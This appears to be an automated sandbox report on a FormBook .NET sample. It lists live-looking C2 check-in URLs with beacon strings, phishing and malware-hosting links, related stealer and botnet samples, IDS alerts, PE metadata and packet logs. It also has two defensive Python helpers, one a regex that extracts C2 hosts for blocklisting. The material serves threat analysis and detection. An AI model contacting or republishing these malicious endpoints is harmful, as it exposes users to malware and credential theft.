192.0.78.25 | Ordem_de_compra_#PO358.exe | malicious | FormBook | www.slimshotonline.com/ey16/?xZED=A/o10+Me4fvA+hta8k/hrhXphMSeIGQKvha56Qk62/qkqyp619OkBa+Em/004+n2pKxp&E8bHr=NjqDiB6XRrFpUP
192.0.78.25 | SWIIFT_221036299-043825-sanlccjavap0004.xls | malicious | FormBook, NSISDropper | www.vistcreative.com/sy22/?6lh=MtSt0iztHN3GKhdkHdf88FVArVLYEx1rV+/lL67m6SbcpzMOPDKVfhJUxuw/Sb7h3bDxFQ==&5j5x=ur84vpqh7Z-XcvGp
192.0.78.25 | H66BPNLUSu.exe | malicious | FormBook, GuLoader | www.wereadqueerbooks.com/fg83/?TBxHarK=GZJkuPUqlQ7mEH/3syR+9tqbc80qt/Xiv8iSRhWNxBqWulmFmlrwv3Pha3WY5QzmsBpI&7n=AfmPrpK08nwl5
172.67.171.253 | 9nncBfTB8Kjm7ge.exe | malicious | FormBook, PureLog Stealer | www.beatricesswarthout.xyz/ns03/?DTdTP=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKA+tCLthbykq&jhIpS=Vhct
172.67.171.253 | SA3f1R5Kpq.exe | malicious | LummaC Stealer | volkstera.fun/api
172.67.160.57 | https://share.formbold.com/3djRr | malicious | Unknown | (no context)
15.197.142.173 | D05285734 DHL.exe | malicious | FormBook | www.rutgersorthopedics.com/kh11/?lnPhO=Iip38xbzW4Vl0cZT3E/lr35AfwmEn4iBqZL8fJqzX17FY9279t6Q8c1Vq41DoUwLL209&2d=1bqlVz20oD7h_jl
15.197.142.173 | Documento de solicitacao de pedido No 158645080.exe | malicious | FormBook, PureLog Stealer | www.nordens-media.com/pz08/?UN=0paP1db0Y&uZCx=32Qm6Ke2HKMNxWuGOo4gUstP0NhHa1GW0Wc3g6Bmqj6dA0nbRKEtQTutVN3cyf6M+aXy
15.197.142.173 | Confirm.exe | malicious | FormBook, PureLog Stealer | www.emsculptcenterofne.com/he2a/?t4=nhNBuRlcN2LBUz/tqG7X18Db1Kxbenb5b3vHQO2tFDH+XtD98Je8GVRwkF5SAfIuZ1Yu&SX=V8KDzvsP
15.197.142.173 | Solicitud de pedido Documento No 168646080.exe | malicious | FormBook, PureLog Stealer | www.nordens-media.com/pz08/?cx=32Qm6Ke2HKMNxWuGOo4gUstP0NhHa1GW0Wc3g6Bmqj6dA0nbRKEtQTutVOb61eG0z72pbUCjvw==&CR=_DHhAtX
15.197.142.173 | mRWU3uqJ2O.exe | malicious | FormBook | www.quickfibrokers.com/pz08/?Tp=HBipkFZhs6F0s&QrKPp0c=FGzpPczua9V5Fhp0KyeSYZEXQ8ThSiWTqmgy8xu2EJQTOQiKwoJBowNtdQTGdZeSbR5L
15.197.142.173 | DHL Factura Electronica Pendiente documento No 04BB25083.exe | malicious | FormBook, PureLog Stealer | www.quickfibrokers.com/pz08/?Ap=FGzpPczua9V5Fhp0KyeSYZEXQ8ThSiWTqmgy8xu2EJQTOQiKwoJBowNtdQHJGs6scj9G&N6Ahw=3ffl2F0Punah42
15.197.142.173 | MCYq2AqNU0.exe | malicious | Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig | veselcontractors.com/pma/
15.197.142.173 | rEncomendarPDF.exe | malicious | FormBook, PureLog Stealer | www.magiccarpet-ride.com/ge22/?GxoX=5+uINVVgHWl4OpIYki5JTJ8/JA9Xhhy7bPh3OZNS8e32NQo31PLkDzGWAjp7srORSYYgrbq6bw==&xVZpGL=6l3Df6RXzhnPD
15.197.142.173 | O4FR7BTmYq.exe | malicious | FormBook, GuLoader | www.soundmoneymiles.com/cg86/
15.197.142.173 | qUGJZ4Ih2v.exe | malicious | FormBook | www.tryscriptify.com/gy14/?Ylg8g4Ap=4JZiO/K9dKDZpUKGlDNe0/6pZOUW7vCSruOjW8aGne4X7Ok9IXpluEcnNjb2dUCVfwxE&Thct=Dxlpdbhpx
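The FormBook context URLs in the table above share one shape: a host, a four-character path segment (ve92, jk56, btrd, pz08 and so on) and, usually, a query string in which the longer value is a base64-looking blob. The Python below is added here as a worked example; it is not Joe Sandbox code and not anything recovered from the sample. It takes a pasted block of flattened context rows, keeps only rows that fit that shape, rejects the ones that do not (the LummaC "/api" panel, a bare IP) and reduces the result to a deduplicated host list suitable for a blocklist. The four-alphanumeric path heuristic and the "longest query value carries the beacon" rule are my assumptions drawn from the URLs on this page, not a FormBook specification; the embedded input is copied from the rows above.

```python
"""Extract FormBook-looking C2 URLs from flattened Joe Sandbox context rows.

Added example for this report, not Joe Sandbox's own code. The URL shape it keys
on is a heuristic taken from the URLs visible in the report, not a published spec.
"""
import re
from urllib.parse import parse_qsl

# Constructed input: context rows copied from the report's IP table, plus a
# LummaC panel path and a bare IP that the filter is expected to reject.
SAMPLE_ROWS = """
• www.voyagedebetterave.com/ve92/?KVvTZtEp=SKXwm0mP5osv+tB3n7pxaJIuZ2gns/beRRSaI9loB4VQNRcKjWpGz3LlPIL/LOa7b1KdZakZ+A==&ixo=GL0X
• www.burduremlakilan.com/jk56/?ndfxyf=R2Jd4&Jd7H=vUHa4t/MdhdOwuVCvD8uyvIDFi6LExMKoOKM/kOuD2lIQwvS7J46LAC2Okr9THJErjNM
• www.lajtuf.com/bp31/
• www.illuminati4me.com/btrd/?2dz=odelT&-Z1dnr=Q3kWi+8g+tbDAN4znzTYQaSHZDljXDmr3SwP0PohYWX18fCHdmrKk2iHJyaTwrNQ+JWy
• www.illuminati4me.com/btrd/?DJE00XC=Q3kWi+8g+tbDAN4znzTYQaSHZDljXDmr3SwP0PohYWX18fCHdmrKk2iHJx6M7Ldokur4&pN9=DXj4tZAh6XiT_JF
• volkstera.fun/api
• 208.91.197.27
"""

# host, then exactly one four-alphanumeric path segment, then an optional query.
# Assumption (from the URLs on this page): that segment is the campaign tag.
C2_RE = re.compile(
    r"^(?P<host>[a-z0-9.-]+\.[a-z]{2,})/(?P<tag>[a-z0-9]{4})/(?:\?(?P<query>\S*))?$",
    re.IGNORECASE,
)


def extract_c2(rows: str) -> list[dict]:
    """Return one dict per FormBook-looking row: host, path tag and the query key
    whose value is longest (assumed to carry the encrypted beacon)."""
    found = []
    for raw in rows.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = C2_RE.match(line)
        if not m:
            continue  # not the host/<tag>/ shape: panel paths, bare IPs, noise
        pairs = parse_qsl(m.group("query") or "", keep_blank_values=True)
        payload_key = max(pairs, key=lambda kv: len(kv[1]))[0] if pairs else None
        found.append(
            {
                "host": m.group("host").lower(),
                "tag": m.group("tag").lower(),
                "payload_key": payload_key,
            }
        )
    return found


def c2_domains(rows: str) -> list[str]:
    """Sorted, deduplicated host list for blocklisting or DNS hunting."""
    return sorted({r["host"] for r in extract_c2(rows)})


if __name__ == "__main__":
    for r in extract_c2(SAMPLE_ROWS):
        print(f"{r['host']:32} tag={r['tag']} payload_key={r['payload_key']}")
    print("domains:", ", ".join(c2_domains(SAMPLE_ROWS)))
```

The host list is the stable indicator here; the path tag and query keys rotate per campaign and per beacon, so they are worth logging for clustering but not for blocking.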
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.scheuermannworks.com | iU3WGoA77BdiFdA.exe | malicious | FormBook | 208.91.197.27
www.beatricesswarthout.xyz | 9nncBfTB8Kjm7ge.exe | malicious | FormBook, PureLog Stealer | 172.67.171.253
www.agathis.fun | 9nncBfTB8Kjm7ge.exe | malicious | FormBook, PureLog Stealer | 104.21.23.10
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AUTOMATTICUS | https://www.fmsl.net/wp-content/uploads/2020/08/Welker_Logo_RGB.png | malicious | Unknown | 192.0.76.3
AUTOMATTICUS | https://dataintegration.info/simplify-vm-migrations-with-migrate-for-compute-engine-as-a-service | malicious | Unknown | 192.0.73.2
AUTOMATTICUS | https://www.fzhla.cn/ | malicious | Unknown | 192.0.73.2
AUTOMATTICUS | https://yvuy3.sa.com/userdashboard/excel.html | malicious | Unknown | 192.0.77.48
AUTOMATTICUS | https://vk39fk6q.r.eu-west-1.awstrack.me/L0/https:%2F%2Fwww.it-supportdesk.com%2Fsignin%3Ft=eyJhbGciOiJIUzI1NiJ9.eyJ0cmFja2luZ190b2tlbiI6ImM1MTBjMTIzLWY0ZDItNDgxNy04MjA3LTQyMTc5NjQ5ZjM0ZCIsImNlbGwiOiJodHRwczovLzIxZzZqZnZoeTYuZXhlY3V0ZS1hcGkudXMtZWFzdC0yLmFtYXpvbmF3cy5jb20vcHJvZC9hcGkvcGhpc2hpbmdjYW1wYWlnbiIsImNhbXBhaWduX3Rva2VuIjoiYzlmZDg1MjktNmU3OS00Mjg0LThlMDctMDE4YzA2MzRiNzBkIiwidGVzdF90b2tlbiI6ZmFsc2UsImV4dGVybmFsX3RyYWluaW5nIjpmYWxzZSwiaWF0IjoxNzEwNTIxNzkzLCJpc3MiOiJodHRwczovL2FwcC5waGlzaHRocmVhdC5jb20iLCJleHAiOjE3MTgyOTc3OTN9.acbxJAWf0gH2wdXpoYLdPMMH8ddjGDb0yI_pv5M44Cw/1/0102018e430b3dbc-87181efe-fa71-4ae3-935b-34f82c73479a-000000/V5ckyifVczO4_hRJyU_Z-0zviGk=365 | malicious | Unknown | 192.0.66.2
AUTOMATTICUS | https://vk39fk6q.r.eu-west-1.awstrack.me/L0/https:%2F%2Fwww.it-supportdesk.com%2Fsignin%3Ft=eyJhbGciOiJIUzI1NiJ9.eyJ0cmFja2luZ190b2tlbiI6ImM1MTBjMTIzLWY0ZDItNDgxNy04MjA3LTQyMTc5NjQ5ZjM0ZCIsImNlbGwiOiJodHRwczovLzIxZzZqZnZoeTYuZXhlY3V0ZS1hcGkudXMtZWFzdC0yLmFtYXpvbmF3cy5jb20vcHJvZC9hcGkvcGhpc2hpbmdjYW1wYWlnbiIsImNhbXBhaWduX3Rva2VuIjoiYzlmZDg1MjktNmU3OS00Mjg0LThlMDctMDE4YzA2MzRiNzBkIiwidGVzdF90b2tlbiI6ZmFsc2UsImV4dGVybmFsX3RyYWluaW5nIjpmYWxzZSwiaWF0IjoxNzEwNTIxNzkzLCJpc3MiOiJodHRwczovL2FwcC5waGlzaHRocmVhdC5jb20iLCJleHAiOjE3MTgyOTc3OTN9.acbxJAWf0gH2wdXpoYLdPMMH8ddjGDb0yI_pv5M44Cw/1/0102018e430b3dbc-87181efe-fa71-4ae3-935b-34f82c73479a-000000/V5ckyifVczO4_hRJyU_Z-0zviGk=365 | malicious | Unknown | 192.0.66.2
AUTOMATTICUS | https://vk39fk6q.r.eu-west-1.awstrack.me/L0/https:%2F%2Fwww.it-supportdesk.com%2Fsignin%3Ft=eyJhbGciOiJIUzI1NiJ9.eyJ0cmFja2luZ190b2tlbiI6ImM1MTBjMTIzLWY0ZDItNDgxNy04MjA3LTQyMTc5NjQ5ZjM0ZCIsImNlbGwiOiJodHRwczovLzIxZzZqZnZoeTYuZXhlY3V0ZS1hcGkudXMtZWFzdC0yLmFtYXpvbmF3cy5jb20vcHJvZC9hcGkvcGhpc2hpbmdjYW1wYWlnbiIsImNhbXBhaWduX3Rva2VuIjoiYzlmZDg1MjktNmU3OS00Mjg0LThlMDctMDE4YzA2MzRiNzBkIiwidGVzdF90b2tlbiI6ZmFsc2UsImV4dGVybmFsX3RyYWluaW5nIjpmYWxzZSwiaWF0IjoxNzEwNTIxNzkzLCJpc3MiOiJodHRwczovL2FwcC5waGlzaHRocmVhdC5jb20iLCJleHAiOjE3MTgyOTc3OTN9.acbxJAWf0gH2wdXpoYLdPMMH8ddjGDb0yI_pv5M44Cw/1/0102018e430b3dbc-87181efe-fa71-4ae3-935b-34f82c73479a-000000/V5ckyifVczO4_hRJyU_Z-0zviGk=365 | malicious | Unknown | 192.0.66.2
AUTOMATTICUS | https://www.thestarnewstoday.com/ | malicious | Unknown | 192.0.66.184
AUTOMATTICUS | https://carson.com/customers/software/ | malicious | Unknown | 192.0.76.3
AUTOMATTICUS | https://www.fyfgyzo.cn/ | malicious | Unknown | 192.0.73.2
CLOUDFLARENETUS | Clear-EasyPrint.b7002.ntclear.top.SK008.ch.exe | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | ekstre_pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 104.26.13.205
CLOUDFLARENETUS | FVN001-230824.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | Quote.exe | malicious | FormBook | 104.21.56.165
CLOUDFLARENETUS | PI.1.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
CLOUDFLARENETUS | proforma_Invoice_0009300_74885959969_9876.exe | malicious | Snake Keylogger | 104.21.67.152
CLOUDFLARENETUS | QUOTE.exe | malicious | AgentTesla, GuLoader | 172.67.74.152
CLOUDFLARENETUS | Quotation lists.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | SOA FEB 2024.exe | malicious | AgentTesla | 104.26.13.205
CLOUDFLARENETUS | gMCSnfJRqp.exe | malicious | FormBook | 172.67.169.232
TANDEMUS | 1xGvWmAmvc.elf | malicious | Unknown | 15.219.33.195
TANDEMUS | USeZCMmN0v.elf | malicious | Unknown | 128.88.223.187
TANDEMUS | http://diy94imq.duckdns.org/ | malicious | Unknown | 15.197.206.21
TANDEMUS | http://herwi7yd4.duckdns.org/ | malicious | Unknown | 15.197.206.21
TANDEMUS | http://ddqcsl2x.duckdns.org/ | malicious | Unknown | 15.197.206.21
TANDEMUS | SpsdYiAti9.elf | malicious | Mirai | 128.88.14.230
TANDEMUS | https://mail.msmjmlr.top/ | malicious | Unknown | 15.197.193.217
TANDEMUS | https://brandequity.economictimes.indiatimes.com/etl.php?url=//zerpcon.com/nxgtnrtn/imgsdoll#ZnJvdGlyb3RpQGFzc25hdC5xYy5jYQ== | malicious | Unknown | 15.197.193.217
TANDEMUS | https://flow.page/laapc.com | malicious | Unknown | 15.197.193.217
TANDEMUS | https://ibit.ly/odett | malicious | Unknown | 15.197.193.217
                                                                                                                  No context
                                                                                                                  No context
Process: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
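The dropped file previewed above has the CRLF-delimited record shape of a .NET CLR assembly usage log (the ".." in the preview is the report's rendering of the line break): an integer record type, one or two quoted strings, and a trailing flag. From the visible rows, type-2 records carry an assembly display name and type-3 records carry a display name plus the path of its native image under NativeImages_v4.0.30319_32. For triage the useful questions are which assemblies the process pulled in and whether every strong-name PublicKeyToken is one of Microsoft's framework tokens, since a packer's payload or stager assembly usually is not. The parser below is an added example, not Joe Sandbox code; the record-type meanings are inferred from the preview, the sample input is the complete records from that preview plus one constructed third-party row named ExampleThirdParty, and the Microsoft token set is the three well-known .NET Framework public key tokens.

```python
"""Parse a .NET CLR usage log and flag non-Microsoft assemblies.

Added example for this report, not Joe Sandbox code. Record-type meanings are
inferred from the rows visible in the dropped-file preview.
"""
import csv
import io
import re

# Constructed sample: the complete records from the report's preview, CRLF
# restored, plus one made-up third-party assembly row (ExampleThirdParty).
SAMPLE_LOG = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\920e3d1d70447c3c10e69e6df0766568\\System.ni.dll",0\r\n'
    '2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
    '3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\8b2c1203fd20aea8260bfbc518004720\\System.Core.ni.dll",0\r\n'
    '3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\2192b0d5aa4aa14486ae08118d3b9fcc\\System.Configuration.ni.dll",0\r\n'
    '2,"ExampleThirdParty, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null",0\r\n'
)

# Public key tokens used by Microsoft's .NET Framework assemblies.
MICROSOFT_TOKENS = {"b77a5c561934e089", "b03f5f7f11d50a3a", "31bf3856ad364e35"}

TOKEN_RE = re.compile(r"PublicKeyToken=([0-9a-fA-F]{16}|null)")


def parse_usage_log(text: str) -> list[dict]:
    """Return one dict per assembly record (types 2 and 3). Type-1 rows are
    runtime markers ("fusion", "WinRT") and are skipped."""
    assemblies = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) < 3 or row[0] not in ("2", "3"):
            continue
        display_name = row[1]
        m = TOKEN_RE.search(display_name)
        token = m.group(1).lower() if m else None
        # Type-3 rows carry the native image (*.ni.dll) path as the third field.
        native_image = row[2] if row[0] == "3" and len(row) >= 4 else None
        assemblies.append(
            {
                "name": display_name.split(",", 1)[0].strip(),
                "token": token,
                "native_image": native_image,
                "microsoft": token in MICROSOFT_TOKENS,
            }
        )
    return assemblies


def non_microsoft(text: str) -> list[str]:
    """Names of assemblies whose strong-name token is not a Microsoft one.
    Anything listed here deserves a look: it is code the sample brought along."""
    return [a["name"] for a in parse_usage_log(text) if not a["microsoft"]]


if __name__ == "__main__":
    for a in parse_usage_log(SAMPLE_LOG):
        flag = "" if a["microsoft"] else "  <-- non-Microsoft"
        print(f"{a['name']:24} token={a['token']} ni={'yes' if a['native_image'] else 'no'}{flag}")
    print("review:", non_microsoft(SAMPLE_LOG))
```

On a real system the usage log sits under the user's AppData\Local\Microsoft\CLR_v4.0*\UsageLogs\ directory, one file per .NET executable, so the same parser can be pointed at a host's logs to see which assemblies an unknown .NET binary loaded even after the process is gone.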
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.786493335198377
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.98%
• Win32 Executable (generic) a (10002005/4) 49.93%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: duGqHKp0OUXaX1D.exe
File size: 841'224 bytes
MD5: e2eda8c49ab184de6d3b030bd499e4d1
SHA1: 2747c8421270d9630708f343b98fb2012dc38003
SHA256: d68a5d440931df383de62e3436f5f485ecd75b552e8b78065706a8c880828378
SHA512: ce66aadb5249daf082847be1209f05b2b40fc0b645b38dd4661dca903b75065c5ef3f9872340c7795c6aa1dc987608c963181753e88c38f5b76bfb3193033e99
SSDEEP: 12288:jQAqsJTENl3zRaMrOQ9aMG8fwarcbNJC//a9SvW09a9f7bkWb1eVY20egIJFW9dO:kAPxENlFaMrvEkYarcJJs/amBQN16Yzi
TLSH: B9052201BAC9A755D76447F322FA90118BB12E872470D50E6C9073CF4A37FC5ABA2B5B
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>................0.................. ........@.. ....................................@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x4cb392
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x8E073EEC [Wed Jul 5 03:52:12 2045 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                  Signature Valid:false
                                                                                                                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                  Error Number:-2146869232
                                                                                                                  Not Before, Not After
                                                                                                                  • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                                                                                  Subject Chain
                                                                                                                  • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                  Version:3
                                                                                                                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                  Serial:7C1118CBBADC95DA3752C46E47A27438
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al  (this instruction repeats for the remainder of the listing)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xcb33e | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcc000 | 0x694 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xca000 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xce000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc9bc0 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc9398 | 0xc9400 | 52247b017ba50f32aa509f2016ff73fa | False | 0.9040312014751553 | data | 7.791946698624655 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xcc000 | 0x694 | 0x800 | f62932b8cf7f57ede335ff7747011d69 | False | 0.3662109375 | data | 3.6315500749990233 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xce000 | 0xc | 0x200 | 3603d43950f548641bee4d0fab78e8a2 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xcc090 | 0x404 | data | | | 0.4270428015564202
RT_MANIFEST | 0xcc4a4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/18/24-14:45:15.449269 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49719 | 80 | 192.168.2.8 | 208.91.197.27
03/18/24-14:42:31.107731 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.8 | 172.67.146.200
03/18/24-14:44:13.611801 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.8 | 192.0.78.25
03/18/24-14:41:50.896878 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49711 | 80 | 192.168.2.8 | 104.21.23.10
03/18/24-14:43:52.963321 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49716 | 80 | 192.168.2.8 | 216.40.34.41
03/18/24-14:42:51.242337 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49714 | 80 | 192.168.2.8 | 172.67.160.57
03/18/24-14:44:34.116378 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.8 | 15.197.142.173
03/18/24-14:43:11.686520 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49715 | 80 | 192.168.2.8 | 172.67.171.253
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                  Mar 18, 2024 14:43:52.963165998 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:52.963247061 CET4971680192.168.2.8216.40.34.41
                                                                                                                  Mar 18, 2024 14:43:52.963320971 CET4971680192.168.2.8216.40.34.41
                                                                                                                  Mar 18, 2024 14:43:53.081453085 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081484079 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081496000 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081510067 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081523895 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081536055 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081562042 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081607103 CET4971680192.168.2.8216.40.34.41
                                                                                                                  Mar 18, 2024 14:43:53.081648111 CET4971680192.168.2.8216.40.34.41
                                                                                                                  Mar 18, 2024 14:43:53.081706047 CET4971680192.168.2.8216.40.34.41
                                                                                                                  Mar 18, 2024 14:44:13.524069071 CET4971780192.168.2.8192.0.78.25
                                                                                                                  Mar 18, 2024 14:44:13.611567020 CET8049717192.0.78.25192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:13.611675024 CET4971780192.168.2.8192.0.78.25
                                                                                                                  Mar 18, 2024 14:44:13.611800909 CET4971780192.168.2.8192.0.78.25
                                                                                                                  Mar 18, 2024 14:44:13.699366093 CET8049717192.0.78.25192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:13.699393034 CET8049717192.0.78.25192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:13.699453115 CET8049717192.0.78.25192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:13.699532032 CET4971780192.168.2.8192.0.78.25
                                                                                                                  Mar 18, 2024 14:44:13.699595928 CET4971780192.168.2.8192.0.78.25
                                                                                                                  Mar 18, 2024 14:44:13.787108898 CET8049717192.0.78.25192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:34.020958900 CET4971880192.168.2.815.197.142.173
                                                                                                                  Mar 18, 2024 14:44:34.116192102 CET804971815.197.142.173192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:34.116378069 CET4971880192.168.2.815.197.142.173
                                                                                                                  Mar 18, 2024 14:44:34.116378069 CET4971880192.168.2.815.197.142.173
                                                                                                                  Mar 18, 2024 14:44:34.211232901 CET804971815.197.142.173192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:34.211697102 CET804971815.197.142.173192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:34.211710930 CET804971815.197.142.173192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:34.211813927 CET4971880192.168.2.815.197.142.173
